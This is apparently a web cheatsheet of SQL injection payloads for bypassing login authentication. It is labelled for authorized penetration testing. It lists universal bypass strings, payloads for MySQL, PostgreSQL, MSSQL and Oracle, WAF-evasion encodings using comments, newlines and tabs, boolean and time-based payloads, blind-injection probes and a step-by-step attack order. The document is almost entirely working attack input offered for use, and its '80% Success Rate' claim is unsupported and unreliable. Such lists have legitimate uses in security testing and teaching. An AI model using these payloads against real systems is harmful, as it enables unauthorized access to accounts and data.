๐ SQL Injection Login Bypass - Ultimate Cheatsheet
Curated by Aryan Giri | Cybersecurity Researcher
For authorized penetration testing only
๐ฅ UNIVERSAL BYPASS PAYLOADS (80% Success Rate)
These work on most SQL databases regardless of configuration
' OR '1'='1
CRITICAL
Universal
' OR 1=1--
CRITICAL
Universal
admin' OR '1'='1
CRITICAL
Universal
' OR 'a'='a
CRITICAL
Universal
' OR ''='
CRITICAL
Universal
๐ CLASSIC & PROVEN PAYLOADS
Time-tested payloads that work in most scenarios
' OR 1=1#
HIGH
MySQL
' OR 1=1 /*
HIGH
Multi-line
' OR '1'='1'-- -
HIGH
With Space
' OR 1 LIMIT 1--
HIGH
MySQL
๐๏ธ DATABASE-SPECIFIC PAYLOADS
Targeted payloads for specific database engines
MySQL Specific
' || '1'='1'--
MEDIUM
MySQL
' OR 1=1 --+
MEDIUM
MySQL
' OR '1'='1'/*!50000--*/
MEDIUM
MySQL v5+
PostgreSQL Specific
' OR '1'='1'--
MEDIUM
PostgreSQL
' OR 1--
MEDIUM
PostgreSQL
MSSQL Specific
' OR '1'='1'--
MEDIUM
MSSQL
admin' OR '1'='1'--
MEDIUM
MSSQL
Oracle Specific
' OR '1'='1'--
MEDIUM
Oracle
' OR 1=1--
MEDIUM
Oracle
๐ก๏ธ WAF & FILTER BYPASS TECHNIQUES
Evade Web Application Firewalls and input filters
'/**/OR/**/'1'='1'--
MEDIUM
Comment Bypass
'%0AOR%0A'1'='1'--
MEDIUM
Newline Bypass
'%09OR%091=1--
MEDIUM
Tab Bypass
' OR '1'LIKE'1'--
MEDIUM
Operator Bypass
' /*!OR*/ '1'='1'--
MEDIUM
MySQL Version
โก ADVANCED & CREATIVE PAYLOADS
For sophisticated filters and edge cases
' OR TRUE--
LOW
Boolean
' OR NOT 0--
LOW
Boolean Not
' XOR '1'='2'--
LOW
XOR Logic
' OR 1=1 AND SLEEP(5)--
LOW
Time Based
๐๏ธ BLIND SQL INJECTION BYPASS
When you can't see direct results but can infer success
' OR (SELECT COUNT(*))>0--
HIGH
Blind
' OR EXISTS(SELECT * FROM users)--
HIGH
Blind
' OR LENGTH(database())>0--
HIGH
Blind
' OR SUBSTRING(database(),1,1)='a'--
HIGH
Blind
๐ฏ TESTING METHODOLOGY
- Start with Universal Payloads - Try the first 5 payloads from Universal category
- Identify Database - Use error messages or DB-specific payloads
- Try Classic Payloads - Use proven payloads for identified DB
- Bypass WAF if blocked - Use comment/newline/tab bypass techniques
- Try Advanced Techniques - For sophisticated filters
- Attempt Blind SQLi - If no direct feedback
Additional Payloads (Special Cases):
' OR '1'='1' OR '1'='1
' OR '1'='1' AND '1'='1
admin' OR '1'='1'--'
' OR '1'='1' UNION SELECT NULL,NULL--